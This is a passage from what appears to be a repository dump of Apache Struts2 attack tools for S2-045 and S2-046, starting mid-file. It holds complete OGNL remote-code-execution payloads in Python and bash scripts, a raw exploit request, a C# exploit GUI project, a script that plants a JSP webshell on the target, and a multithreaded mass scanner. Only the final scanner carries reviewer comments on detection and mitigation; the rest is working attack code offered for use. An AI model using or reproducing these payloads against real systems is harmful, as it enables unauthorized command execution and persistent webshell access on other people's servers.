java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n-----------------------------735323031399963166993862150--\r\n\r\n" 23 | 24 | #print "data="+data 25 | url=str(sys.argv[1]) 26 | try: 27 | #代理配置 28 | #proxy_handler=urllib2.ProxyHandler({'http':'http://127.0.0.1:8081', 'https':'https:// username:password @proxyhk.huawei.com:8080'}) 29 | #opener=urllib2.build_opener(proxy_handler) 30 | 31 | opener = urllib2.build_opener() 32 | urllib2.install_opener(opener) 33 | req = urllib2.Request(url) 34 | req.add_header('Content-Type',type) 35 | req.add_header('User-Agent',user_agent) 36 | #req.add_header('Accept',accept) 37 | #req.add_header('Content-Length',length) 38 | res=opener.open(req,data) 39 | response=res.read() 40 | print response.strip() 41 | except urllib2.URLError,e: 42 | print "Exploit Fail:%s" %e 43 | 44 | try: 45 | poc(str(sys.argv[2])) 46 | except Exception,e: 47 | print e 48 | exit(-1) -------------------------------------------------------------------------------- /struts2/s2-045 POC/HttpCodeLib.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-045 POC/HttpCodeLib.dll -------------------------------------------------------------------------------- /struts2/s2-046.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | url=$1 4 | cmd=$2 5 | shift 6 | shift 7 | 8 | boundary="---------------------------735323031399963166993862150" 9 | content_type="multipart/form-data; boundary=$boundary" 10 | echo $content_type 11 | payload=$(echo 
"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}") 12 | 13 | printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- $@ 14 | ~ 15 | ~ 16 | -- 可视 -- 13 1,2 全部 -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2013 4 | VisualStudioVersion = 12.0.40629.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "s2-045", "s2-045\s2-045.csproj", "{B5458322-F240-4963-B4AD-35EC1F5EED1A}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {B5458322-F240-4963-B4AD-35EC1F5EED1A}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | 
{B5458322-F240-4963-B4AD-35EC1F5EED1A}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {B5458322-F240-4963-B4AD-35EC1F5EED1A}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {B5458322-F240-4963-B4AD-35EC1F5EED1A}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | EndGlobal 23 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045.v12.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045.v12.suo -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Windows.Forms; 5 | 6 | namespace s2_045 7 | { 8 | static class Program 9 | { 10 | /// 11 | /// 应用程序的主入口点。 12 | /// 13 | [STAThread] 14 | static void Main() 15 | { 16 | Application.EnableVisualStyles(); 17 | Application.SetCompatibleTextRenderingDefault(false); 18 | Application.Run(new Form1()); 19 | } 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // 有关程序集的常规信息通过以下 6 | // 特性集控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("s2-045")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("s2-045")] 13 | [assembly: AssemblyCopyright("Copyright © 2017")] 14 | 
[assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 使此程序集中的类型 18 | // 对 COM 组件不可见。 如果需要从 COM 访问此程序集中的类型, 19 | // 则将该类型上的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("4863ae9c-b183-4a84-bda7-976ddfa5af8a")] 24 | 25 | // 程序集的版本信息由下面四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 生成号 30 | // 修订号 31 | // 32 | // 可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值, 33 | // 方法是按如下所示使用“*”: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // 此代码由工具生成。 4 | // 运行时版本: 4.0.30319.42000 5 | // 6 | // 对此文件的更改可能会导致不正确的行为,并且如果 7 | // 重新生成代码,这些更改将丢失。 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace s2_045.Properties 12 | { 13 | 14 | 15 | /// 16 | /// 一个强类型的资源类,用于查找本地化的字符串等。 17 | /// 18 | // 此类是由 StronglyTypedResourceBuilder 19 | // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。 20 | // 若要添加或移除成员,请编辑 .ResX 文件,然后重新运行 ResGen 21 | // (以 /str 作为命令选项),或重新生成 VS 项目。 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | internal class Resources 26 | { 27 | 28 | private static global::System.Resources.ResourceManager resourceMan; 29 | 30 | private static global::System.Globalization.CultureInfo resourceCulture; 31 | 32 | 
[global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 33 | internal Resources() 34 | { 35 | } 36 | 37 | /// 38 | /// 返回此类使用的、缓存的 ResourceManager 实例。 39 | /// 40 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 41 | internal static global::System.Resources.ResourceManager ResourceManager 42 | { 43 | get 44 | { 45 | if ((resourceMan == null)) 46 | { 47 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("s2_045.Properties.Resources", typeof(Resources).Assembly); 48 | resourceMan = temp; 49 | } 50 | return resourceMan; 51 | } 52 | } 53 | 54 | /// 55 | /// 为所有资源查找重写当前线程的 CurrentUICulture 属性, 56 | /// 方法是使用此强类型资源类。 57 | /// 58 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 59 | internal static global::System.Globalization.CultureInfo Culture 60 | { 61 | get 62 | { 63 | return resourceCulture; 64 | } 65 | set 66 | { 67 | resourceCulture = value; 68 | } 69 | } 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/Properties/Settings.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 
8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace s2_045.Properties 12 | { 13 | 14 | 15 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 16 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")] 17 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase 18 | { 19 | 20 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings()))); 21 | 22 | public static Settings Default 23 | { 24 | get 25 | { 26 | return defaultInstance; 27 | } 28 | } 29 | } 30 | } 31 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/Properties/Settings.settings: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2-045.csproj.FileListAbsolute.txt: 
-------------------------------------------------------------------------------- 1 | D:\C#代码\s2-045\s2-045\obj\Debug\s2-045.csprojResolveAssemblyReference.cache 2 | D:\C#代码\s2-045\s2-045\obj\Debug\s2_045.Form1.resources 3 | D:\C#代码\s2-045\s2-045\obj\Debug\s2_045.Properties.Resources.resources 4 | D:\C#代码\s2-045\s2-045\obj\Debug\s2-045.csproj.GenerateResource.Cache 5 | D:\C#代码\s2-045\s2-045\bin\Debug\s2-045.exe 6 | D:\C#代码\s2-045\s2-045\bin\Debug\s2-045.pdb 7 | D:\C#代码\s2-045\s2-045\bin\Debug\HttpHelper.dll 8 | D:\C#代码\s2-045\s2-045\bin\Debug\HttpHelper.xml 9 | D:\C#代码\s2-045\s2-045\obj\Debug\s2-045.exe 10 | D:\C#代码\s2-045\s2-045\obj\Debug\s2-045.pdb 11 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2-045.csproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2-045.csproj.GenerateResource.Cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2-045.csprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2-045.csprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2-045.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2-045.exe -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2-045.pdb: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2-045.pdb -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2_045.Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2_045.Form1.resources -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Debug/s2_045.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Debug/s2_045.Properties.Resources.resources -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2-045.csproj.FileListAbsolute.txt: 
-------------------------------------------------------------------------------- 1 | D:\C#代码\s2-045\s2-045\bin\Release\s2-045.exe 2 | D:\C#代码\s2-045\s2-045\bin\Release\s2-045.pdb 3 | D:\C#代码\s2-045\s2-045\bin\Release\HttpHelper.dll 4 | D:\C#代码\s2-045\s2-045\bin\Release\HttpHelper.xml 5 | D:\C#代码\s2-045\s2-045\obj\Release\s2_045.Form1.resources 6 | D:\C#代码\s2-045\s2-045\obj\Release\s2_045.Properties.Resources.resources 7 | D:\C#代码\s2-045\s2-045\obj\Release\s2-045.csproj.GenerateResource.Cache 8 | D:\C#代码\s2-045\s2-045\obj\Release\s2-045.exe 9 | D:\C#代码\s2-045\s2-045\obj\Release\s2-045.pdb 10 | D:\C#代码\s2-045\s2-045\obj\Release\s2-045.csprojResolveAssemblyReference.cache 11 | -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2-045.csproj.GenerateResource.Cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2-045.csproj.GenerateResource.Cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2-045.csprojResolveAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2-045.csprojResolveAssemblyReference.cache -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2-045.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2-045.exe -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2-045.pdb: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2-045.pdb -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2_045.Form1.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2_045.Form1.resources -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/obj/Release/s2_045.Properties.Resources.resources: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2-046源码/s2-045/obj/Release/s2_045.Properties.Resources.resources -------------------------------------------------------------------------------- /struts2/s2-046源码/s2-045/s2-045.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {B5458322-F240-4963-B4AD-35EC1F5EED1A} 8 | WinExe 9 | Properties 10 | s2_045 11 | s2-045 12 | v4.0 13 | 512 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | ..\..\..\移动\苏飞开发助手V1.0正式版\HttpHelper万能框架V1.9.0.6-DLL\HttpHelper.dll 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | Form 53 | 54 | 55 | Form1.cs 56 | 57 | 58 | 59 | 60 | Form1.cs 61 | 62 | 63 | ResXFileCodeGenerator 64 | Resources.Designer.cs 65 | Designer 66 | 67 | 68 | True 69 | Resources.resx 70 | 71 | 72 | SettingsSingleFileGenerator 73 | Settings.Designer.cs 74 | 75 | 76 | True 
77 | Settings.settings 78 | True 79 | 80 | 81 | 82 | 89 | -------------------------------------------------------------------------------- /struts2/s2045一键getshell/readme.txt: -------------------------------------------------------------------------------- 1 | python pi_struts2-045.py url.txt 8 -------------------------------------------------------------------------------- /struts2/s2045一键getshell/tmp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2045一键getshell/tmp.txt -------------------------------------------------------------------------------- /struts2/s2045一键getshell/url.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/s2045一键getshell/url.txt -------------------------------------------------------------------------------- /struts2/s2getshell.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import urllib2 3 | import sys,getopt,ctypes 4 | def exp(url,payload): 5 | try: 6 | opener = urllib2.build_opener() 7 | urllib2.install_opener(opener) 8 | req = urllib2.Request(url) 9 | req.add_header('Content-Type',payload) 10 | return opener.open(req, "").read() 11 | except urllib2.URLError,e: 12 | return "fail" 13 | return "fail" 14 | class Color: 15 | std_out_handle = ctypes.windll.kernel32.GetStdHandle(-11) 16 | def print_(self, print_text): 17 | print print_text 18 | def print_green_text(self, print_text): 19 | self.set_cmd_color(0x02 | 0x08) 20 | print print_text 21 | self.reset_color() 22 | def print_red_text(self, print_text): 23 | self.set_cmd_color(0x04 | 0x08) 24 | print print_text 25 | self.reset_color() 26 | def reset_color(self): 27 | self.set_cmd_color(0x04 | 0x02 | 0x01) 28 | def set_cmd_color(self, color, 
handle=std_out_handle): 29 | bool = ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color) 30 | return bool 31 | jspCode = "By<%new java.io.FileOutputStream(request.getParameter(\\\"f\\\")).write(request.getParameter(\\\"c\\\").getBytes());%>Luan" 32 | clr = Color() 33 | clr.print_green_text("S2-045 Exploit // Code By Luan QQ:1524946693") 34 | opts, args = getopt.getopt(sys.argv[1:], "u:c:p:") 35 | url,cmd,path = "","","" 36 | for op, value in opts: 37 | if op == '-u': 38 | url = value 39 | elif op == '-c': 40 | cmd = value 41 | elif op == '-p': 42 | path = value 43 | if url == "": 44 | clr.print_red_text("Useage : exp.py -u url [-c cmd] [-p upfilePath]") 45 | sys.exit(0) 46 | if cmd == "": 47 | clr.print_("upload webshell ...") 48 | if path == "": 49 | path = "#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getSession().getServletContext().getRealPath('/')" 50 | else: 51 | path = "'" + path + "'" 52 | payload = "%{(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#luan='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#path=" + path + ").(#shell='" + jspCode + "').(new java.io.BufferedWriter(new java.io.FileWriter(#path+'/luan.jsp').append(#shell)).close()).(#cmd='echo \\\"write file to '+#path+'/luan.jsp\\\"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" 53 | else: 54 | clr.print_("run " + cmd + " 
...") 55 | payload = "%{(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#luan='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" 56 | result = exp(url,payload) 57 | if result == "fail": 58 | clr.print_red_text("Exploit Fail") 59 | else: 60 | clr.print_green_text(result) -------------------------------------------------------------------------------- /struts2/st2-046-poc/README.MD: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/st2-046-poc/README.MD -------------------------------------------------------------------------------- /struts2/st2-046-poc/exploit-cd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | url=$1 4 | cmd=$2 5 | shift 6 | shift 7 | 8 | boundary="---------------------------735323031399963166993862150" 9 | content_type="multipart/form-data; boundary=$boundary" 10 | payload=$(echo 
"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"$cmd"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}") 11 | 12 | printf -- "--$boundary\r\nContent-Disposition: form-data; name=\"foo\"; filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--$boundary--\r\n\r\n" "$payload" | curl "$url" -H "Content-Type: $content_type" -H "Expect: " -H "Connection: close" --data-binary @- $@ -------------------------------------------------------------------------------- /struts2/st2-046-poc/reqnull.txt: -------------------------------------------------------------------------------- 1 | POST / HTTP/1.1 2 | Host: localhost:8080 3 | Connection: close 4 | Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150 5 | Content-Length: 5000 6 | 7 | -----------------------------735323031399963166993862150 8 | Content-Disposition: form-data; name="foo"; 
filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='hostname').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}b" 9 | Content-Type: text/plain 10 | 11 | x 12 | -----------------------------735323031399963166993862150-- -------------------------------------------------------------------------------- /struts2/st2-046-poc/st2-046.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/st2-046-poc/st2-046.jpg -------------------------------------------------------------------------------- /struts2/st2-046-poc/st2-046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/st2-046-poc/st2-046.png -------------------------------------------------------------------------------- /struts2/str2-045.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuian/hacking-script/8e768ce1476f192710e02f9c37b584d70a88303d/struts2/str2-045.txt -------------------------------------------------------------------------------- /struts2/struts2_045 多线程批量检测脚本.py: 
--------------------------------------------------------------------------------
# Bulk checker for the Struts2 S2-045 issue (Python 2: urllib2, print statements).
# For every URL listed in url.txt it sends one multipart POST whose Content-Type
# header is an OGNL expression, and treats the marker string "nMask" in the
# response body as proof that the server evaluated the expression.
#
# NOTE(review): this is an active test, not a passive fingerprint. A hit means
# `echo nMask` was really executed on the target host and its output was
# copied into the HTTP response.
#
# Detection: the request is recognisable by a Content-Type request header that
# starts with "%{" and names ognl.OgnlContext / java.lang.ProcessBuilder.
# The User-Agent below is a fixed Chrome 56 string, but it is an ordinary
# browser value and easy to change, so it is a weak indicator on its own.
# Mitigation: upgrade Struts to a release that fixes S2-045; filtering such
# headers at a proxy or WAF is only a stopgap.
import urllib2
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
import threading
def poc(url):
    """Send the S2-045 probe to *url* and record the URL if the marker comes back.

    Prints one result line per URL and, on a hit, appends the URL to the
    module-level file object ``f``. ``f`` is created only in the
    ``__main__`` block below, so calling this function after importing the
    module would fail on the ``f.write`` line.
    """
    # presumably installs poster's streaming handlers into urllib2's default
    # opener; it is called again on every invocation - TODO confirm it is idempotent
    register_openers()
    # Builds a multipart body from the local file tmp.txt. The file object is
    # never closed explicitly.
    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
    header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    # Overwrites the Content-Type that multipart_encode generated with the OGNL
    # expression. The expression replaces the member-access policy, clears the
    # excluded package/class lists, then runs #cmd through cmd.exe /c (Windows)
    # or /bin/bash -c (otherwise) and streams the process output into the
    # servlet response.
    header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    try:
        request = urllib2.Request(url,datagen,headers=header)
        response = urllib2.urlopen(request,timeout=5)
        body=response.read()
    # NOTE(review): the bare except turns every failure (timeout after 5 s,
    # DNS or TLS error, HTTP error status) into an empty body, which is then
    # reported as "not exist". A negative line in the output is therefore not
